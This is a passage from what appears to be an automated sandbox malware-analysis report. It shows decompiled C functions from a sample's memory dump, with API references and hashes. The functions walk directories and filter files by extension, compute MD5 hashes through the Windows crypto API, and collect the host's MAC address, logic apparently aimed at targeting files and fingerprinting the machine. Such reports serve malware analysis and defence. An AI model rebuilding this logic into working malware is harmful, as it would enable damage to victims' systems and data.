												if(_t518 == 0) {
													L92:
													_t336 = 0;
													L94:
													if(_t336 == 0) {
														goto L137;
													}
													if((_v796.dwFileAttributes & 0x00000010) == 0) {
														_t460 = _t458 + 1;
														_v24 = _t460;
														if(_t460 >= 0x400) {
															_v24 = 0;
															E00411AB0();
														}
														if(_a32 == 0) {
															goto L137;
														} else {
															_v28 = 7;
															_push(0xffffffff);
															_v48 = 0;
															_v32 = 0;
															E00414690(_t460,  &_v48,  &_a4, 0);
															_v8 = 9;
															if(_v796.cFileName != 0) {
																_t484 =  &(_v796.cFileName);
																_t241 = _t484 + 2; // 0x2
																_t519 = _t241;
																do {
																	_t340 =  *_t484;
																	_t484 = _t484 + 2;
																} while (_t340 != 0);
																_t486 = _t484 - _t519 >> 1;
																L108:
																_push(_t486);
																_t487 =  &_v48;
																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
																_t344 =  >=  ? _v48 :  &_v48;
																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
																_v17 = 0;
																_t346 = _v56;
																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
																_t531 =  *((intOrPtr*)(_t346 + 0x890));
																if(_t541 == _t531) {
																	L118:
																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
																	_t529 =  *(_t346 + 0x89c);
																	if(_t542 == _t529) {
																		L126:
																		if(_v17 == 0) {
																			_t348 = _t346 + 0x868;
																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
																				_t348 =  *_t348;
																			}
																			_push(_t461);
																			_push(_t348);
																			_t349 = E00421C02(_t487);
																			_t547 = _t547 + 8;
																			if(_t349 == 0) {
																				_t462 = _v56;
																				_t488 = _t462 + 0x820;
																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
																					_t488 =  *_t488;
																				}
																				_push(_t488);
																				_t351 =  >=  ? _v48 :  &_v48;
																				_push( >=  ? _v48 :  &_v48);
																				_t352 = E00421C02(_t488);
																				_t547 = _t547 + 8;
																				if(_t352 == 0) {
																					_t521 =  >=  ? _v48 :  &_v48;
																					E004111C0(_t462,  >=  ? _v48 :  &_v48);
																				}
																			}
																		}
																		L134:
																		_v8 = 5;
																		if(_v28 >= 8) {
																			L00422587(_v48);
																			_t547 = _t547 + 4;
																		}
																		_t540 = _v52;
																		goto L137;
																	}
																	L120:
																	L120:
																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
																		_t354 = _t542;
																	} else {
																		_t354 =  *_t542;
																	}
																	_t487 =  &(_v796.cFileName);
																	_push( &(_v796.cFileName));
																	_push(_t354);
																	_t355 = E00421C02( &(_v796.cFileName));
																	_t547 = _t547 + 8;
																	if(_t355 != 0) {
																		goto L134;
																	}
																	_t542 = _t542 + 0x18;
																	if(_t542 != _t529) {
																		goto L120;
																	}
																	_t346 = _v56;
																	goto L126;
																}
																L110:
																L110:
																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
																	_t356 = _t541;
																} else {
																	_t356 =  *_t541;
																}
																_push(_t461);
																_push(_t356);
																_t357 = E00421C02(_t487);
																_t547 = _t547 + 8;
																if(_t357 != 0) {
																	goto L116;
																}
																_t541 = _t541 + 0x18;
																if(_t541 != _t531) {
																	goto L110;
																}
																L117:
																_t346 = _v56;
																goto L118;
																L116:
																_v17 = 1;
																goto L117;
															}
															_t486 = 0;
															goto L108;
														}
													}
													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
													_t547 = _t547 + 4;
													_push(1);
													_v8 = 7;
													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													_push(0xffffffff);
													_v8 = 8;
													E00414690(_t458,  &_v180,  &_v204, 0);
													_v156 = 0;
													E00413B70(_a28,  &_v180);
													if(_v160 >= 8) {
														L00422587(_v180);
														_t547 = _t547 + 4;
													}
													_v8 = 5;
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													if(_v184 >= 8) {
														L00422587(_v204);
														_t547 = _t547 + 4;
													}
													goto L137;
												}
												_t523 =  *((intOrPtr*)(_t335 + 2));
												_t204 =  &(_t482[2]); // 0x2e
												if(_t523 !=  *_t204) {
													break;
												}
												_t335 = _t335 + 4;
												_t482 =  &(_t482[4]);
												if(_t523 != 0) {
													continue;
												}
												goto L92;
											}
											asm("sbb eax, eax");
											_t336 = _t335 | 0x00000001;
											goto L94;
										}
										_t524 =  *((intOrPtr*)(_t330 + 2));
										_t201 =  &(_t481[2]); // 0x2e0000
										if(_t524 !=  *_t201) {
											break;
										}
										_t330 = _t330 + 4;
										_t481 =  &(_t481[4]);
										if(_t524 != 0) {
											continue;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t331 = _t330 | 0x00000001;
									goto L86;
									L137:
									_t333 = FindNextFileW(_t540,  &_v796);
									_t458 = _v24;
								} while (_t333 != 0);
								FindClose(_t540);
								goto L139;
							}
						}
						_t549 = _t546 - 0x18;
						_t494 = _t549;
						_push(0xffffffff);
						 *(_t494 + 0x14) = 7;
						 *(_t494 + 0x10) = 0;
						 *_t494 = 0;
						E00414690(_t457, _t494,  &_a4, 0);
						_t374 = E0040F310(_t529, _t538);
						_t546 = _t549 + 0x18;
						if(_t374 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						E00414690(_t457,  &_v128,  &_a4, 0);
						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
						_v8 = 6;
						_t497 = 0;
						_t380 = _v112;
						_t543 = _v92;
						if(_t380 == 0) {
							L57:
							_t463 = _v56;
							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
							_t381 = _t463 + 0x820;
							if(_t381[0xa] >= 8) {
								_t381 =  *_t381;
							}
							PathAppendW(_t543, _t381);
							_push(_v24);
							_v28 = 7;
							_v32 = 0;
							_v48 = 0;
							E00418400( &_v48, _t543, _v88);
							if(_v108 >= 8) {
								L00422587(_v128);
								_t546 = _t546 + 4;
							}
							_t500 = _v28;
							_v108 = 7;
							_v112 = 0;
							_v128 = 0;
							if(_t500 >= 8) {
								_v128 = _v48;
							} else {
								_t402 = _v32 + 1;
								if(_v32 + 1 != 0) {
									E004205A0( &_v128,  &_v48, _t402 + _t402);
									_t500 = _v28;
									_t546 = _t546 + 0xc;
								}
							}
							_v112 = _v32;
							_t389 =  >=  ? _v128 :  &_v128;
							_v108 = _t500;
							if(PathFileExistsW( >=  ? _v128 :  &_v128) == 0) {
								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00);
								_t501 = _t463 + 0x838;
								_t550 = _t546 + 4;
								_t529 = _t392;
								if(_t501[0xa] >= 8) {
									_t501 =  *_t501;
								}
								lstrcpyW(_t529, _t501);
								_t394 = _t463 + 0x850;
								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
									_t394 =  *_t394;
								}
								lstrcatW(_t529, _t394);
								_t551 = _t550 - 0x18;
								_t502 = _t551;
								_push(0xffffffff);
								 *(_t502 + 0x14) = 7;
								 *(_t502 + 0x10) = 0;
								 *_t502 = 0;
								E00414690(_t463, _t502,  &_v128, 0);
								E0040F0E0(_t529);
								E00420BED(_t529);
								_t546 = _t551 + 0x1c;
							}
							_v8 = 5;
							if(_t543 != 0) {
								L00422587(_t543);
								_t546 = _t546 + 4;
							}
							goto L73;
						}
						do {
							_t409 =  >=  ? _v128 :  &_v128;
							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
							_t497 = _t497 + 1;
							_t380 = _v112;
						} while (_t497 < _t380);
						goto L57;
					}
				} else {
					_t464 = 0;
					do {
						_v28 = 7;
						_push(0xffffffff);
						_v48 = 0;
						_v32 = 0;
						E00414690(_t464,  &_v48,  &_a4, 0);
						_v8 = 1;
						_push(0xffffffff);
						_v104 = 0;
						_v84 = 7;
						_v88 = 0;
						E00414690(_t464,  &_v104,  *_v24 + _t464, 0);
						_v8 = 2;
						_t525 = _v32;
						if(_t525 <= 1) {
							L10:
							if(_v84 >= 8) {
								L00422587(_v104);
								_t546 = _t546 + 4;
							}
							_v84 = 7;
							_v8 = 0;
							_v88 = 0;
							_v104 = 0;
							if(_v28 >= 8) {
								L00422587(_v48);
								_t546 = _t546 + 4;
							}
							goto L14;
						}
						_t507 = _v88;
						if(_t507 <= 1) {
							goto L10;
						} else {
							_t446 =  >=  ? _v48 :  &_v48;
							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
								_t507 = _v88;
							}
							_t544 = _v104;
							_t448 =  >=  ? _t544 :  &_v104;
							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
								_t544 = _v104;
							}
							_t509 =  >=  ? _t544 :  &_v104;
							_t450 =  >=  ? _v48 :  &_v48;
							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
							_t547 = _t546 + 8;
							if(_t451 == 0) {
								if(_v84 >= 8) {
									L00422587(_v104);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v84 = 7;
								_v88 = 0;
								_v104 = 0;
								if(_v28 >= 8) {
									_t326 = L00422587(_v48);
									_t547 = _t547 + 4;
								}
								L146:
								if(_a24 >= 8) {
									_t326 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t326;
							} else {
								_t537 = _v52;
								goto L10;
							}
						}
						L14:
						_t528 = _t528 + 1;
						_t464 = _t464 + 0x18;
					} while (_t528 < _t537);
					goto L15;
				}
			}

0x0040f733
0x0040f735
0x0040f740
0x0040f741
0x0040f748
0x0040f750
0x0040f752
0x0040f756
0x0040f759
0x0040f760
0x0040f76f
0x0040f77e
0x0040f780
0x0040f783
0x0040f8b5
0x0040f8b7
0x0040f8be
0x0040f8c5
0x0040f8c9
0x0040f8d0
0x0040f8d3
0x0040f8d6
0x0040f8de
0x0040f8e5
0x0040f8ea
0x0040f8f5
0x0040f8fb
0x0040f902
0x0040f904
0x0040f90d
0x0040f917
0x0040f921
0x0040f966
0x0040f968
0x0040f968
0x0040f970
0x0040f970
0x0040f973
0x0040f976
0x0040f97d
0x00000000
0x0040f923
0x0040f923
0x0040f97f
0x0040f97f
0x0040f987
0x0040f98c
0x0040f9a8
0x0040f9af
0x0040f9b5
0x0040f9ba
0x0040f9bf
0x0040f9bf
0x0040f9c4
0x0040f9cb
0x0040f9d2
0x0040f9da
0x0040f9f6
0x0040f9f9
0x0040f9dc
0x0040f9df
0x0040f9e0
0x0040f9ea
0x0040f9ef
0x0040f9ef
0x0040f9e0
0x0040fa02
0x0040fa08
0x0040fa0d
0x0040fa14
0x0040fa1b
0x0040fa1b
0x0040fa22
0x0040fa27
0x0040fa2c
0x0040fa2c
0x0040fa2f
0x0040fa31
0x0040fa44
0x0040fa4c
0x0040fa53
0x0040fa59
0x0040fa5f
0x0040fa61
0x0040fa61
0x0040fa64
0x0040fa64
0x0040fa67
0x0040fa6a
0x0040fa71
0x0040fa73
0x0040fa73
0x0040fa7b
0x0040fa98
0x0040fa9f
0x0040faa5
0x0040faaa
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fabb
0x0040fac2
0x0040faca
0x0040fae6
0x0040fae9
0x0040facc
0x0040facf
0x0040fad0
0x0040fada
0x0040fadf
0x0040fadf
0x0040fad0
0x0040faf2
0x0040faf8
0x0040fafd
0x0040fb04
0x0040fb0b
0x0040fb0b
0x0040fb12
0x0040fb1b
0x0040fb20
0x0040fb20
0x00000000
0x0040fb12
0x0040fa5b
0x00000000
0x0040fa5b
0x0040fb2b
0x0040fcf0
0x0040fcfb
0x0040fd00
0x0040fd07
0x0040fd09
0x0040fd09
0x0040fd13
0x0040fd1d
0x0040fd20
0x0040fd25
0x0040fd2a
0x0040fd2d
0x0040fd2d
0x0040fd32
0x0040fd39
0x0040fd3b
0x0040fd42
0x0040fd46
0x0040fd4c
0x00410072
0x00410076
0x0041007e
0x00410083
0x00410083
0x00410088
0x00410093
0x0041009d
0x004100a4
0x004100a9
0x004100ae
0x004100ae
0x004100b3
0x004100be
0x004100c5
0x004100c9
0x004100ce
0x004100d3
0x004100d3
0x004100d6
0x004100d8
0x004100df
0x004100e6
0x00000000
0x0040fd52
0x0040fd52
0x0040fd60
0x0040fd60
0x0040fd65
0x0040fd70
0x0040fd70
0x0040fd76
0x00000000
0x00000000
0x0040fd7b
0x0040fd92
0x0040fd92
0x0040fd9b
0x0040fd9d
0x00000000
0x00000000
0x0040fda3
0x0040fda8
0x0040fdb0
0x0040fdb0
0x0040fdb6
0x00000000
0x00000000
0x0040fdbb
0x0040fdd2
0x0040fdd2
0x0040fddb
0x0040fddd
0x00000000
0x00000000
0x0040fdea
0x0040fec2
0x0040fec3
0x0040fecc
0x0040fece
0x0040fed5
0x0040fed5
0x0040fede
0x00000000
0x0040fee4
0x0040fee6
0x0040feed
0x0040fef0
0x0040fefa
0x0040ff02
0x0040ff07
0x0040ff13
0x0040ff19
0x0040ff1f
0x0040ff1f
0x0040ff22
0x0040ff22
0x0040ff25
0x0040ff28
0x0040ff2f
0x0040ff31
0x0040ff31
0x0040ff39
0x0040ff3c
0x0040ff48
0x0040ff53
0x0040ff55
0x0040ff59
0x0040ff5c
0x0040ff62
0x0040ff6a
0x0040ff9a
0x0040ff9a
0x0040ffa0
0x0040ffa8
0x0040ffda
0x0040ffde
0x0040ffe0
0x0040ffe9
0x0040ffeb
0x0040ffeb
0x0040ffed
0x0040ffee
0x0040ffef
0x0040fff4
0x0040fff9
0x0040fffb
0x00410005
0x0041000b
0x0041000d
0x0041000d
0x00410016
0x00410017
0x0041001b
0x0041001c
0x00410021
0x00410026
0x00410031
0x00410035
0x00410035
0x00410026
0x0040fff9
0x0041003a
0x0041003a
0x00410042
0x00410047
0x0041004c
0x0041004c
0x0041004f
0x00000000
0x0041004f
0x00000000
0x0040ffb0
0x0040ffb4
0x0040ffba
0x0040ffb6
0x0040ffb6
0x0040ffb6
0x0040ffbc
0x0040ffc2
0x0040ffc3
0x0040ffc4
0x0040ffc9
0x0040ffce
0x00000000
0x00000000
0x0040ffd0
0x0040ffd5
0x00000000
0x00000000
0x0040ffd7
0x00000000
0x0040ffd7
0x00000000
0x0040ff70
0x0040ff74
0x0040ff7a
0x0040ff76
0x0040ff76
0x0040ff76
0x0040ff7c
0x0040ff7d
0x0040ff7e
0x0040ff83
0x0040ff88
0x00000000
0x00000000
0x0040ff8a
0x0040ff8f
0x00000000
0x00000000
0x0040ff97
0x0040ff97
0x00000000
0x0040ff93
0x0040ff93
0x00000000
0x0040ff93
0x0040ff15
0x00000000
0x0040ff15
0x0040fede
0x0040fe00
0x0040fe05
0x0040fe08
0x0040fe15
0x0040fe19
0x0040fe20
0x0040fe2a
0x0040fe34
0x0040fe3b
0x0040fe44
0x0040fe4f
0x0040fe5e
0x0040fe65
0x0040fe71
0x0040fe79
0x0040fe7e
0x0040fe7e
0x0040fe83
0x0040fe8e
0x0040fe98
0x0040fea2
0x0040fea9
0x0040feb5
0x0040feba
0x0040feba
0x00000000
0x0040fea9
0x0040fdbd
0x0040fdc1
0x0040fdc5
0x00000000
0x00000000
0x0040fdc7
0x0040fdca
0x0040fdd0
0x00000000
0x00000000
0x00000000
0x0040fdd0
0x0040fdd6
0x0040fdd8
0x00000000
0x0040fdd8
0x0040fd7d
0x0040fd81
0x0040fd85
0x00000000
0x00000000
0x0040fd87
0x0040fd8a
0x0040fd90
0x00000000
0x00000000
0x00000000
0x0040fd90
0x0040fd96
0x0040fd98
0x00000000
0x00410052
0x0041005a
0x00410060
0x00410063
0x0041006c
0x00000000
0x0041006c
0x0040fd4c
0x0040fb31
0x0040fb36
0x0040fb38
0x0040fb3a
0x0040fb41
0x0040fb49
0x0040fb50
0x0040fb55
0x0040fb5a
0x0040fb5f
0x00000000
0x00000000
0x0040fb65
0x0040fb70
0x0040fb81
0x0040fb86
0x0040fb8a
0x0040fb8c
0x0040fb8f
0x0040fb94
0x0040fbbb
0x0040fbbb
0x0040fbc0
0x0040fbc5
0x0040fbcf
0x0040fbd1
0x0040fbd1
0x0040fbd5
0x0040fbdb
0x0040fbe0
0x0040fbed
0x0040fbf5
0x0040fbf9
0x0040fc02
0x0040fc07
0x0040fc0c
0x0040fc0c
0x0040fc0f
0x0040fc14
0x0040fc1b
0x0040fc22
0x0040fc29
0x0040fc4c
0x0040fc2b
0x0040fc2e
0x0040fc2f
0x0040fc3c
0x0040fc41
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc5b
0x0040fc60
0x0040fc6b
0x0040fc72
0x0040fc77
0x0040fc7d
0x0040fc84
0x0040fc86
0x0040fc88
0x0040fc88
0x0040fc8c
0x0040fc99
0x0040fc9f
0x0040fca1
0x0040fca1
0x0040fca5
0x0040fcab
0x0040fcb0
0x0040fcb2
0x0040fcb4
0x0040fcbb
0x0040fcc3
0x0040fcca
0x0040fcd1
0x0040fcd7
0x0040fcdc
0x0040fcdc
0x0040fcdf
0x0040fce5
0x0040fce8
0x0040fced
0x0040fced
0x00000000
0x0040fce5
0x0040fba0
0x0040fba7
0x0040fbaf
0x0040fbb3
0x0040fbb4
0x0040fbb7
0x00000000
0x0040fba0
0x0040f789
0x0040f789
0x0040f790
0x0040f792
0x0040f799
0x0040f79c
0x0040f7a6
0x0040f7ae
0x0040f7b3
0x0040f7bc
0x0040f7bf
0x0040f7ca
0x0040f7d2
0x0040f7d9
0x0040f7de
0x0040f7e2
0x0040f7e8
0x0040f870
0x0040f874
0x0040f879
0x0040f87e
0x0040f87e
0x0040f883
0x0040f88a
0x0040f891
0x0040f898
0x0040f89c
0x0040f8a1
0x0040f8a6
0x0040f8a6
0x00000000
0x0040f89c
0x0040f7ee
0x0040f7f4
0x00000000
0x0040f7f6
0x0040f7fd
0x0040f807
0x0040f809
0x0040f813
0x0040f818
0x0040f818
0x0040f821
0x0040f827
0x0040f830
0x0040f832
0x0040f83c
0x0040f844
0x0040f844
0x0040f850
0x0040f858
0x0040f85d
0x0040f862
0x0040f867
0x0040f92b
0x0040f930
0x0040f935
0x0040f935
0x0040f938
0x0040f93a
0x0040f945
0x0040f94c
0x0040f950
0x0040f959
0x0040f95e
0x0040f95e
0x004100ea
0x004100ee
0x004100f3
0x004100f8
0x00410100
0x0041010b
0x0040f86d
0x0040f86d
0x00000000
0x0040f86d
0x0040f867
0x0040f8a9
0x0040f8a9
0x0040f8aa
0x0040f8ad
0x00000000
0x0040f790

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t42;
				int* _t43;
				char _t45;
				char _t51;
				intOrPtr _t58;
				void* _t72;
				intOrPtr* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t91;
				void* _t92;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t99;

				 *[fs:0x0] = _t96;
				_t97 = _t96 - 0x38;
				_t73 = _a4;
				_v20 = _t97;
				_t88 = __ecx;
				_v32 = 0;
				_t92 = __edx;
				_v24 = 0;
				_v36 = 0;
				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
				_t42 =  &_v32;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], 0x4caa00, 0xffffffff);
				if(_t42 == 0) {
					_v40 = _t42;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t43 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
				if(_t43 == 0) {
					_v44 = _t43;
					_t43 = E00430ECA( &_v44, 0x5085b8);
				}
				__imp__CryptHashData(_v24, _t88, _t92, 0);
				if(_t43 == 0) {
					_v48 = _t43;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t93 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
				_t105 = _t45;
				if(_t45 == 0) {
					_v52 = _t45;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
				_v36 = _t89;
				E0042B420(_t89, 0, _v28 + 1);
				_t99 = _t97 + 0x10;
				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
				if(_t51 == 0) {
					_v56 = _t51;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t94 = 0;
				while(_t94 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
					_t99 = _t99 + 0xc;
					if(_v72 != 0) {
						_t80 =  &_v72;
						_t35 = _t80 + 1; // 0x1
						_t86 = _t35;
						do {
							_t58 =  *_t80;
							_t80 = _t80 + 1;
							__eflags = _t58;
						} while (_t58 != 0);
						_push(_t80 - _t86);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					} else {
						_push(0);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					}
					L18:
				}
				E00422110(_t89);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
				goto L18;
			}

0x0040eab1
0x0040eab8
0x0040eabc
0x0040eac1
0x0040eac4
0x0040eacf
0x0040ead6
0x0040ead8
0x0040eadf
0x0040eae6
0x0040eaf6
0x0040eaf9
0x0040eb01
0x0040eb09
0x0040eb0b
0x0040eb17
0x0040eb17
0x0040eb1c
0x0040eb2c
0x0040eb34
0x0040eb36
0x0040eb42
0x0040eb42
0x0040eb4e
0x0040eb56
0x0040eb58
0x0040eb64
0x0040eb64
0x0040eb69
0x0040eb7c
0x0040eb83
0x0040eb85
0x0040eb87
0x0040eb89
0x0040eb95
0x0040eb95
0x0040ebab
0x0040ebad
0x0040ebb4
0x0040ebb9
0x0040ebc8
0x0040ebcc
0x0040ebce
0x0040ebda
0x0040ebda
0x0040ebdf
0x0040ebe1
0x0040ebf4
0x0040ebf9
0x0040ec00
0x0040ec13
0x0040ec16
0x0040ec16
0x0040ec20
0x0040ec20
0x0040ec22
0x0040ec23
0x0040ec23
0x0040ec2c
0x0040ec30
0x0040ec35
0x0040ec02
0x0040ec07
0x0040ec0b
0x0040ec10
0x0040ec10
0x00000000
0x0040ec00
0x0040ec39
0x0040ec44
0x0040ec4f
0x0040ec5a
0x0040ec67
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: a599e18bc04695a82c26e85c85861b91a013a0871735adccb8c8778c42f29281
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: a599e18bc04695a82c26e85c85861b91a013a0871735adccb8c8778c42f29281
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t14;
				char* _t15;
				void* _t35;
				void* _t36;
				void* _t37;
				char* _t41;
				void* _t44;
				void* _t45;

				_t33 = __ebx;
				_push(_t36);
				_v8 = 0x288;
				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
				_t45 = _t44 + 8;
				_t49 = _t41;
				if(_t41 != 0) {
					_t14 =  &_v8;
					__imp__GetAdaptersInfo(_t41, _t14);
					__eflags = _t14 - 0x6f;
					if(_t14 != 0x6f) {
						L4:
						_t15 =  &_v8;
						__imp__GetAdaptersInfo(_t41, _t15);
						__eflags = _t15;
						if(_t15 == 0) {
							_push( *(_t41 + 0x199) & 0x000000ff);
							_push( *(_t41 + 0x198) & 0x000000ff);
							_push( *(_t41 + 0x197) & 0x000000ff);
							_push( *(_t41 + 0x196) & 0x000000ff);
							_push( *(_t41 + 0x195) & 0x000000ff);
							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
							_push(_t37);
							_t11 = _t41 + 0x1b0; // 0x1b0
							_push("Address: %s, mac: %s\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_push("\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_t45 = _t45 + 0x30;
						}
						E00420BED(_t41);
						return _t37;
					} else {
						E00420BED(_t41);
						_t41 = E00420C62(_t33, _t35, _t37, _v8);
						_t45 = _t45 + 8;
						__eflags = _t41;
						if(__eflags == 0) {
							goto L1;
						} else {
							goto L4;
						}
					}
				} else {
					L1:
					_push("Error allocating memory needed to call GetAdaptersinfo\n");
					E00421F2D(_t33, _t37, _t41, _t49);
					E00420BED(_t37);
					return 0;
				}
			}

0x0040e670
0x0040e675
0x0040e678
0x0040e689
0x0040e690
0x0040e692
0x0040e695
0x0040e697
0x0040e6b4
0x0040e6b9
0x0040e6bf
0x0040e6c2
0x0040e6db
0x0040e6db
0x0040e6e0
0x0040e6e6
0x0040e6e8
0x0040e6f1
0x0040e6f9
0x0040e701
0x0040e709
0x0040e711
0x0040e720
0x0040e725
0x0040e726
0x0040e72d
0x0040e732
0x0040e737
0x0040e73c
0x0040e741
0x0040e741
0x0040e745
0x0040e754
0x0040e6c4
0x0040e6c5
0x0040e6d2
0x0040e6d4
0x0040e6d7
0x0040e6d9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e6d9
0x0040e699
0x0040e699
0x0040e699
0x0040e69e
0x0040e6a4
0x0040e6b3
0x0040e6b3

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
